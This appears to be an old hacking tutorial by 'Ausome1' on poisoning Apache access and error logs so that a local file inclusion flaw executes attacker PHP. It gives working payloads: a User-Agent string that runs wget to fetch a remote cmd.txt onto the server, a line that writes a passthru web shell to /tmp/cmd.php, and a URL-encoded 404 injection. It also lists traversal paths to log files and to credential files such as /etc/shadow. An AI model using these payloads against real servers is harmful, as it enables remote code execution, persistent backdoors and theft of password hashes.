LFI Apache Log Poisoning by Ausome1

Here's a quick overview:

If you find a file inclusion vuln and you can't do a remote file include (RFI) attack on it but you can still use the LFI to view things outside the /home/$user directory (open_base turned off). What you can do to include some PHP code for you to execute on the server is to poison some logs. Apache is a good one to do.

There are 2 files for Apache we can try to attack, the access_log and the error_log. To attack the Apache access log we can install the Firefox extension User Agent Switcher. What we do is put some php code in our user agent like so:

<?php phpinfo();?>

or another example <?php passthru('wget -0 /tmp/cmd.php http://www.example_site.com/cmd.txt');?>

Now set FF to use that php_info User Agent you just made and visit the web page. Apache has now added your user agent string to the access_log.

Now we need to find where these Apache log files are located, and use our LFI to go to them, ex:

http://example_site.com/index.php?view=../../../../../../etc/httpd/logs/access_log%00

This will inlcude the log and execute your php code.

As and FYI you can use double quotes and backslashes in your UA, it messes up the Apache access log and you just get a parse error.

So do something like, in your UA:

<?php file_put_contents('/tmp/cmd.php', '<?php passthru(stripslashes($_GET[cmd]));?>');?>

Single quotes are fine. and array indexes without quotes are fine use $_GET[cmd] instead of $_GET['cmd'];

Now there is a downside to attacking the access_log. On busy sites they tend to get big. If the file is to big, your php script will time out.

So you may have to wait till the logs rotate on Sunday nights (usually) and attack then.

Or you can try the Apache error_log, they tend to be smaller.

How to attack the error_log:

This one we don't use the User Agent, we can get php code into the log via the url

What we do is cause a 404 with our php code:

http://example_site.com/%3C%3Fphp%20phpinfo%28%29%3B%3F%3E   <== url encoded <?php phpinfo();?>

YOu have to url encode your php because of the ? Apache think everythign after it is the query string and drops it.

Now that we have poisoned the error_log we can LFI to it and include our PHP code.

I like to use the FireFox extension hackbar for this one. You can write your php code, highlight it, and click urlencode, then execute.

Also, Apache error logs arent't the only things you can attack. Other programs have log files as well, and also you if a website stores user input into a session variable that is stored on the hard drive. You can LFI to the session file and include that.

Heres a couple of places that may be interesting to "visit" with your LFI:

/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

Possible log locations:

../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log

Also, looking in the httpd.conf file might give the location of the log files if they are using custom names.